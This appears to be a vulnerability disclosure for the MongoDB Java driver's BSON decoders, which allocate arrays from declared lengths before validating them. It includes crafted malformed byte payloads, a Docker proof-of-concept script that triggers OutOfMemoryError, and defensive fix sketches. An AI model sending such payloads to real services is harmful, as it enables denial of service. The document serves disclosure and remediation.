Summary
Some BSON decoding paths allocate byte arrays directly from declared BSON lengths before checking whether the input contains enough bytes to satisfy that declaration.
This can turn a malformed BSON input of only a few bytes into a very large allocation attempt and an OutOfMemoryError, rather than a controlled BSON parse rejection.
The paths I observed are:
- BsonBinaryReader.doReadBinaryData()
- BasicBSONDecoder.readObject(InputStream)
- LazyBSONDecoder.readObject(InputStream)
Code paths
For binary fields, BsonBinaryReader.doReadBinaryData() reads the binary length, allocates new byte[numBytes], and then reads into that array:
protected BsonBinary doReadBinaryData() {
    int numBytes = readSize();
    byte type = bsonInput.readByte();
    ...
    byte[] bytes = new byte[numBytes];
    bsonInput.readBytes(bytes);
    return new BsonBinary(type, bytes);
}
Reference:
https://github.com/mongodb/mongo-java-driver/blob/8aa32421452e77e1c33f3ee79a2be76067a6377b/bson/src/main/org/bson/BsonBinaryReader.java#L134-L147
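One way to guard this path is to compare the declared length with the bytes still available before allocating. The sketch below is not driver code: it uses a plain java.nio.ByteBuffer in place of the driver's input abstraction, and the names BoundedBinaryRead and readBinaryPayload are hypothetical. It assumes the whole document is already in memory, so the remaining byte count is known.

```java
import java.nio.ByteBuffer;
import java.nio.ByteOrder;

// Hypothetical helper, not driver code: rejects a declared binary length
// that exceeds the bytes remaining in an in-memory buffer.
final class BoundedBinaryRead {

    // Reads one BSON binary value (int32 length, subtype byte, payload)
    // starting at the buffer's current position and returns the payload.
    static byte[] readBinaryPayload(final ByteBuffer input) {
        input.order(ByteOrder.LITTLE_ENDIAN); // BSON integers are little-endian
        if (input.remaining() < 5) {
            throw new IllegalArgumentException("Truncated binary header");
        }
        int numBytes = input.getInt();
        input.get(); // subtype byte, ignored in this sketch
        // Validate before allocating: the payload cannot be longer than the input.
        if (numBytes < 0 || numBytes > input.remaining()) {
            throw new IllegalArgumentException("Declared binary length " + numBytes
                    + " is invalid for the " + input.remaining() + " bytes remaining");
        }
        byte[] bytes = new byte[numBytes];
        input.get(bytes);
        return bytes;
    }

    public static void main(final String[] args) {
        // Value portion of the report's binary payload: length 0x7fffffff,
        // subtype 0x00, followed by the document terminator.
        byte[] malformed = {(byte) 0xff, (byte) 0xff, (byte) 0xff, 0x7f, 0x00, 0x00};
        try {
            readBinaryPayload(ByteBuffer.wrap(malformed));
        } catch (IllegalArgumentException e) {
            System.out.println("Rejected: " + e.getMessage());
        }
    }
}
```

With this check the allocation is bounded by the size of the input itself, so a 13-byte document can never request more than a few bytes.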
For stream decoding, BasicBSONDecoder.readObject(InputStream) delegates to readFully(...), which reads the first four bytes as the document size and immediately allocates a buffer of that size:
private byte[] readFully(final InputStream input) throws IOException {
    byte[] sizeBytes = new byte[4];
    Bits.readFully(input, sizeBytes);
    int size = Bits.readInt(sizeBytes);
    byte[] buffer = new byte[size];
    System.arraycopy(sizeBytes, 0, buffer, 0, 4);
    Bits.readFully(input, buffer, 4, size - 4);
    return buffer;
}
Reference:
https://github.com/mongodb/mongo-java-driver/blob/8aa32421452e77e1c33f3ee79a2be76067a6377b/bson/src/main/org/bson/BasicBSONDecoder.java#L100-L108
LazyBSONDecoder.decode(InputStream, BSONCallback), which readObject(InputStream) calls, has the same allocate-before-reading-the-body shape:
byte[] documentSizeBuffer = new byte[BYTES_IN_INTEGER];
int documentSize = Bits.readInt(in, documentSizeBuffer);
byte[] documentBytes = Arrays.copyOf(documentSizeBuffer, documentSize);
Bits.readFully(in, documentBytes, BYTES_IN_INTEGER, documentSize - BYTES_IN_INTEGER);
Reference:
https://github.com/mongodb/mongo-java-driver/blob/8aa32421452e77e1c33f3ee79a2be76067a6377b/bson/src/main/org/bson/LazyBSONDecoder.java#L54-L58
Expected behavior
Malformed BSON with impossible or unavailable declared lengths should fail with a controlled BSON parse exception before allocating an array of the declared size.
Actual behavior
Inputs as small as 4 bytes (stream decoders) or 13 bytes (binary field) cause an OutOfMemoryError before the parser rejects the malformed body.
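To make the size mismatch concrete, the following sketch decodes the length fields of the two payloads used in the Reproduction section and compares them with the bytes actually supplied. It relies only on java.nio.ByteBuffer; the class and method names are hypothetical, and the offsets are hard-coded for these specific payloads.

```java
import java.nio.ByteBuffer;
import java.nio.ByteOrder;

// Hypothetical inspector, not driver code: shows declared versus available bytes.
final class DeclaredLengthInspector {

    // Reads a little-endian int32 at the given offset, the encoding BSON
    // uses for document and binary lengths.
    static int declaredLength(final byte[] input, final int offset) {
        return ByteBuffer.wrap(input).order(ByteOrder.LITTLE_ENDIAN).getInt(offset);
    }

    public static void main(final String[] args) {
        byte[] binaryLengthPayload = {
            0x0d, 0x00, 0x00, 0x00,
            0x05, 0x62, 0x00,
            (byte) 0xff, (byte) 0xff, (byte) 0xff, 0x7f,
            0x00,
            0x00
        };
        byte[] streamLengthOnly = {(byte) 0xff, (byte) 0xff, (byte) 0xff, 0x7f};

        // The binary length starts at offset 7: document size (4 bytes),
        // element type (1 byte), and the name "b" with its NUL terminator (2 bytes).
        int binaryDeclared = declaredLength(binaryLengthPayload, 7);
        // The payload would start at offset 12, after the length and the subtype byte.
        int binaryAvailable = binaryLengthPayload.length - 12;
        System.out.println("binary field: declared=" + binaryDeclared
                + " available=" + binaryAvailable);

        int streamDeclared = declaredLength(streamLengthOnly, 0);
        // The stream ends right after the 4-byte length prefix.
        int streamAvailable = streamLengthOnly.length - 4;
        System.out.println("stream document: declared=" + streamDeclared
                + " available after prefix=" + streamAvailable);
    }
}
```

Both declared lengths decode to 0x7fffffff (Integer.MAX_VALUE), while the inputs carry at most one further byte.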
Reproduction
Prerequisites
- Docker
- Network access to clone this repository
- Network access for Gradle dependency resolution
File: repro.sh
#!/usr/bin/env bash
set -euo pipefail
REPO_URL="${REPO_URL:-https://github.com/mongodb/mongo-java-driver.git}"
TARGET_REF="${TARGET_REF:-8aa32421452e77e1c33f3ee79a2be76067a6377b}"
WORKDIR="$(mktemp -d)"
cleanup() {
    rm -rf "$WORKDIR"
}
trap cleanup EXIT
CHECKOUT="$WORKDIR/mongo-java-driver"
REPRO_DIR="$WORKDIR/repro"
git clone --filter=blob:none "$REPO_URL" "$CHECKOUT"
git -C "$CHECKOUT" checkout --detach "$TARGET_REF"
mkdir -p "$REPRO_DIR"
cat > "$REPRO_DIR/Dockerfile" <<'EOF'
FROM eclipse-temurin:17-jdk
RUN apt-get update \
    && DEBIAN_FRONTEND=noninteractive apt-get install -y --no-install-recommends bash ca-certificates \
    && rm -rf /var/lib/apt/lists/*
WORKDIR /repro
COPY BsonDeclaredLengthAllocationPoc.java verify.sh ./
RUN chmod +x /repro/verify.sh
ENTRYPOINT ["/repro/verify.sh"]
EOF
cat > "$REPRO_DIR/BsonDeclaredLengthAllocationPoc.java" <<'EOF'
import org.bson.BasicBSONDecoder;
import org.bson.LazyBSONDecoder;
import org.bson.RawBsonDocument;
import org.bson.codecs.BsonDocumentCodec;
import java.io.ByteArrayInputStream;
public final class BsonDeclaredLengthAllocationPoc {
    public static void main(final String[] args) throws Exception {
        byte[] binaryLengthPayload = new byte[] {
            0x0d, 0x00, 0x00, 0x00,                       // document size: 13 bytes
            0x05, 0x62, 0x00,                             // element type 0x05 (binary), name "b"
            (byte) 0xff, (byte) 0xff, (byte) 0xff, 0x7f,  // declared binary length: 0x7fffffff
            0x00,                                         // binary subtype
            0x00                                          // document terminator
        };
        byte[] streamLengthOnly = new byte[] {
            (byte) 0xff, (byte) 0xff, (byte) 0xff, 0x7f   // declared document size: 0x7fffffff
        };
        expectOutOfMemory("nested binary declared length", () ->
            new RawBsonDocument(binaryLengthPayload).decode(new BsonDocumentCodec()));
        expectOutOfMemory("BasicBSONDecoder stream declared length", () ->
            new BasicBSONDecoder().readObject(new ByteArrayInputStream(streamLengthOnly)));
        expectOutOfMemory("LazyBSONDecoder stream declared length", () ->
            new LazyBSONDecoder().readObject(new ByteArrayInputStream(streamLengthOnly)));
        System.out.println("SUCCESS: declared lengths caused allocation failure before controlled rejection");
    }
    private static void expectOutOfMemory(final String label, final ThrowingRunnable action) throws Exception {
        try {
            action.run();
            throw new IllegalStateException("Expected OutOfMemoryError for " + label);
        } catch (OutOfMemoryError expected) {
            System.out.println("OOM " + label + ": " + expected.getClass().getSimpleName()
                + " " + expected.getMessage());
        }
    }
    private interface ThrowingRunnable {
        void run() throws Exception;
    }
}
EOF
cat > "$REPRO_DIR/verify.sh" <<'EOF'
#!/usr/bin/env bash
set -euo pipefail
TARGET_REPO="${TARGET_REPO:-/target-repo}"
WORK_ROOT="/work"
WORK_REPO="$WORK_ROOT/target"
CLASS_DIR="$WORK_ROOT/classes"
OUTPUT_FILE="$WORK_ROOT/output.txt"
rm -rf "$WORK_ROOT"
mkdir -p "$WORK_ROOT" "$CLASS_DIR"
cp -a "$TARGET_REPO" "$WORK_REPO"
cd "$WORK_REPO"
./gradlew --no-daemon :bson:jar -x test > "$WORK_ROOT/gradle-build.log" 2>&1 || {
    cat "$WORK_ROOT/gradle-build.log"
    exit 1
}
jars=("$WORK_REPO"/bson/build/libs/*.jar)
CP="$(IFS=:; echo "${jars[*]}")"
javac -cp "$CP" /repro/BsonDeclaredLengthAllocationPoc.java -d "$CLASS_DIR"
java -Xmx64m -cp "$CP:$CLASS_DIR" BsonDeclaredLengthAllocationPoc > "$OUTPUT_FILE" 2>&1
cat "$OUTPUT_FILE"
grep -F "OOM nested binary declared length" "$OUTPUT_FILE" >/dev/null
grep -F "OOM BasicBSONDecoder stream declared length" "$OUTPUT_FILE" >/dev/null
grep -F "OOM LazyBSONDecoder stream declared length" "$OUTPUT_FILE" >/dev/null
grep -F "SUCCESS: declared lengths caused allocation failure before controlled rejection" "$OUTPUT_FILE" >/dev/null
EOF
docker build -t mongo-java-driver-bson-declared-length-repro "$REPRO_DIR"
docker run --rm \
    -e TARGET_REPO=/target-repo \
    -v "$CHECKOUT:/target-repo:ro" \
    mongo-java-driver-bson-declared-length-repro
Command
chmod +x repro.sh
./repro.sh
Observed output
OOM nested binary declared length: OutOfMemoryError Requested array size exceeds VM limit
OOM BasicBSONDecoder stream declared length: OutOfMemoryError Requested array size exceeds VM limit
OOM LazyBSONDecoder stream declared length: OutOfMemoryError Requested array size exceeds VM limit
SUCCESS: declared lengths caused allocation failure before controlled rejection
Suggested fix direction
Before allocating arrays from declared BSON lengths, reject lengths that are impossible for the current input or above an appropriate maximum. For stream decoders, this likely means validating the declared document length before allocating the full document buffer.
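For the stream decoders, one possible shape of such a check is sketched below. It is an illustration under assumptions, not a proposed patch: the names BoundedDocumentRead and readDocument, the maxDocumentSize parameter, and the 8 KiB chunk size are all hypothetical. The idea is to validate the declared size against a caller-supplied maximum and then grow the buffer only as bytes actually arrive.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.EOFException;
import java.io.IOException;
import java.io.InputStream;

// Hypothetical helper, not driver code: bounded read of one length-prefixed document.
final class BoundedDocumentRead {
    private static final int MIN_DOCUMENT_SIZE = 5; // 4-byte length plus terminator
    private static final int CHUNK_SIZE = 8192;     // arbitrary chunk size for this sketch

    static byte[] readDocument(final InputStream input, final int maxDocumentSize) throws IOException {
        byte[] sizeBytes = new byte[4];
        int filled = 0;
        while (filled < 4) {
            int read = input.read(sizeBytes, filled, 4 - filled);
            if (read < 0) {
                throw new EOFException("Stream ended inside the length prefix");
            }
            filled += read;
        }
        // Little-endian int32, as BSON encodes the document size.
        int size = (sizeBytes[0] & 0xff) | ((sizeBytes[1] & 0xff) << 8)
                | ((sizeBytes[2] & 0xff) << 16) | ((sizeBytes[3] & 0xff) << 24);
        // Reject impossible or oversized declarations before any large allocation.
        if (size < MIN_DOCUMENT_SIZE || size > maxDocumentSize) {
            throw new IllegalArgumentException("Declared document size " + size
                    + " is outside [" + MIN_DOCUMENT_SIZE + ", " + maxDocumentSize + "]");
        }
        // Allocate incrementally so memory use tracks the bytes actually received.
        ByteArrayOutputStream document = new ByteArrayOutputStream(Math.min(size, CHUNK_SIZE));
        document.write(sizeBytes, 0, 4);
        byte[] chunk = new byte[CHUNK_SIZE];
        int remaining = size - 4;
        while (remaining > 0) {
            int read = input.read(chunk, 0, Math.min(chunk.length, remaining));
            if (read < 0) {
                throw new EOFException("Stream ended with " + remaining + " bytes still declared");
            }
            document.write(chunk, 0, read);
            remaining -= read;
        }
        return document.toByteArray();
    }

    public static void main(final String[] args) throws IOException {
        byte[] streamLengthOnly = {(byte) 0xff, (byte) 0xff, (byte) 0xff, 0x7f};
        try {
            // 16 MiB is used here only as an example limit.
            readDocument(new ByteArrayInputStream(streamLengthOnly), 16 * 1024 * 1024);
        } catch (IllegalArgumentException e) {
            System.out.println("Rejected: " + e.getMessage());
        }
    }
}
```

The maximum handles absurd declarations outright, and the chunked read covers declarations that are under the limit but larger than what the stream delivers, at the cost of one extra copy in toByteArray().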